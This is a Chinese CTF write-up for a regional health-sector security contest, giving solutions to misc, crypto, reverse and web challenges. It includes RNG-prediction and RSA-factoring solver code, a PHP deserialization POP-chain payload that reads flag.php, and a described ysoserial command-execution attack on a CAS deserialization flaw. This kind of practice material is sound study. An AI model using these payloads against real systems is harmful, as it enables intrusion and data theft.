第一届新疆维吾尔自治区卫生行业网络安全大赛WP

第一届新疆维吾尔自治区卫生行业网络安全大赛WP

Misc-多余的base64

下载附件得到一张图片

使用010 Editor打开查看二进制数据

在文件结尾发现base64字符串 在线base64解密

Misc-栅栏先生弹起了他的58号贝斯

先base64解密 在栅栏解密 key 为7时出flag

Crypto-xxxor

原题:

import random
import string

def xor_encrypt(flag):
    encrypted_flag = ""
    random_numbers = []
    for char in flag:
        random_number = random.randint(31, 128)
        random_numbers.append(random_number)
        encrypted_char = chr(ord(char) ^ random_number)
        encrypted_flag += encrypted_char
    hex_encrypted_flag = encrypted_flag.encode('utf-8').hex()
    return hex_encrypted_flag, random_numbers

flag = "*************"
hex_encrypted_result, random_numbers_used = xor_encrypt(flag)
print(hex_encrypted_result, random_numbers_used)

#2310482b551c24440c3f091f216b5c0b6010442d4506296a485f7f76595f0d045d5e57357f094a0a4d2b
#[69, 124, 41, 76, 46, 44, 66, 114, 57, 92, 59, 39, 64, 70, 106, 105, 83, 41, 105, 79, 116, 62, 76, 71, 120, 108, 72, 70, 116, 111, 105, 101, 60, 58, 49, 86, 75, 61, 121, 111, 126, 86]

解题:

def xor_decrypt(hex_encrypted_flag, random_numbers):
    encrypted_flag = bytes.fromhex(hex_encrypted_flag).decode('utf-8')
    decrypted_flag = ""
    for i, char in enumerate(encrypted_flag):
        decrypted_char = chr(ord(char) ^ random_numbers[i])
        decrypted_flag += decrypted_char
    return decrypted_flag

hex_encrypted_result = "2310482b551c24440c3f091f216b5c0b6010442d4506296a485f7f76595f0d045d5e57357f094a0a4d2b"  # 使用加密函数得到的结果
random_numbers_used = [69, 124, 41, 76, 46, 44, 66, 114, 57, 92, 59, 39, 64, 70, 106, 105, 83, 41, 105, 79, 116, 62, 76, 71, 120, 108, 72, 70, 116, 111, 105, 101, 60, 58, 49, 86, 75, 61, 121, 111, 126, 86]   # 使用加密函数得到的随机数列表

decrypted_flag = xor_decrypt(hex_encrypted_result, random_numbers_used)
print(decrypted_flag)

CRrypto-crazycrazymix

原题:

import os
import random

from Crypto.Cipher import AES
from Crypto.Util.number import *

flag = b'xxxxxxxxxxxxxxx'
logger = ""

p = getPrime(512)
q = getPrime(512)
n = p * q
e = 0x10001
m = bytes_to_long(flag)
c = pow(m, e, n)

logger += str(n) + "\n"
logger += str(e) + "\n"
logger += str(c) + "\n"

random.seed(os.urandom(16))
for i in range(0x500):
    logger += str(random.getrandbits(32)) + "\n"
kk =random.getrandbits(128)
key = long_to_bytes(kk)
m = long_to_bytes(((p >> 128) << 128))
ivv = random.getrandbits(128)
iv = long_to_bytes(ivv)
h = AES.new(key, AES.MODE_CBC, iv)
c = h.encrypt(m)

logger += str(bytes_to_long(c))

open("log2", "a").write(logger)

解题:

from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes, bytes_to_long
from mt19937predictor import MT19937Predictor

predictor = MT19937Predictor()

with open('log', 'r') as f:
    randoms = [int(line.strip()) for line in f.readlines()]

for num in randoms[3:1283]:  # randoms为提取的1280个随机数
    predictor.setrandbits(num, 32)

key_parts = predictor.getrandbits(128)
iv_parts = predictor.getrandbits(128)
key = long_to_bytes(key_parts)
iv = long_to_bytes(iv_parts)
c_aes_bytes = long_to_bytes(randoms[-1])

cipher = AES.new(key, AES.MODE_CBC, iv)
m_bytes = cipher.decrypt(c_aes_bytes)
ph = bytes_to_long(m_bytes)

print(ph)
print(randoms[0])

'''sage:
from sage.all import *
n = 102706395226544783414112641274672591894391416216878746807754644929912445175581335470378238742923176414999927249930670447943318136441452438270356357283197464475124949153678265709581089486951962323739833002935020314236558504922905124702232920469787037902411809326441573545744566574227951257179263944516978023591
p4 = 12244220046384568355718560147957910646101667272989641924522439382568476328630595397224497779711283146202805078253820267870797284406644637992154008844763136
def phase3(high_p, n):
    R.<x> = PolynomialRing(Zmod(n), implementation='NTL')
    p = high_p + x
    x0 = p.small_roots(X = 2^128, beta = 0.1)[0]
    
    P = int(p(x0))
    Q = n // P
    print(P)
    assert n == P*Q
 
e = 0x10001
phase3(p4, n)

# 12244220046384568355718560147957910646101667272989641924522439382568476328630595397224497779711283146202805078253820597758447533439212561744757662901813449
'''
p = 12244220046384568355718560147957910646101667272989641924522439382568476328630595397224497779711283146202805078253820597758447533439212561744757662901813449

q = randoms[0] // p
e = randoms[1]
c = randoms[2]

m = pow(c, pow(e, -1, (p - 1) * (q - 1)), p * q)

print(long_to_bytes(m))

Reverse-esabbase

一眼看出 是base64换表加密

在线解密

Web-简单的bot

懂我暗示吗

根据题目想到 robots.txt 文件 访问得到 fffff14g.php 文件

再进行访问 在源代码注释中发现flag

Web-简单的反序列化

题目:

<?php

//flag 在flag.php
error_reporting(0);
highlight_file(__FILE__);
// ini_set('display_errors', 1);
// // 或者关闭错误显示
// // ini_set('display_errors', 0);


class New_gril{
    public $girlfriend;
    function __construct($a){
        $this->girlfriend = $a;
    }
}

class Old_gril{
    public $girlfriend = 'Ok';
    function __destruct(){
        $old = 'long long ago'.$this->girlfriend;
        echo $old;
    }
}

class Ok{
    public $ok;
    function __toString(){
        //flag.php
        echo file_get_contents($this->ok);
        return 'nice';
    }
}
unserialize(($_POST['need']));
?>

解题:

<?php

class Old_gril{
    public $girlfriend = 'Ok';
    function __destruct(){
        $old = 'long long ago'.$this->girlfriend;
        echo $old;
    }
}

class Ok{
    public $ok;
    function __toString(){
        //flag.php
        echo file_get_contents($this->ok);
        return 'nice';
    }
}
$exploit = new Old_gril();
$exploit->girlfriend = new Ok();
$exploit->girlfriend->ok = 'flag.php';
$payload = serialize($exploit);
echo $payload;

?>
//O:8:"Old_gril":1:{s:10:"girlfriend";O:2:"Ok":1:{s:2:"ok";s:8:"flag.php";}}

在源代码中发现flag

Web-ezcas

通过搜索发现 cas 存在反序列化漏洞

解压 查看 用户名和密码

登录后抓包

使用 ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar 生成带回显的payload

在请求头中加入执行的命令 获取flag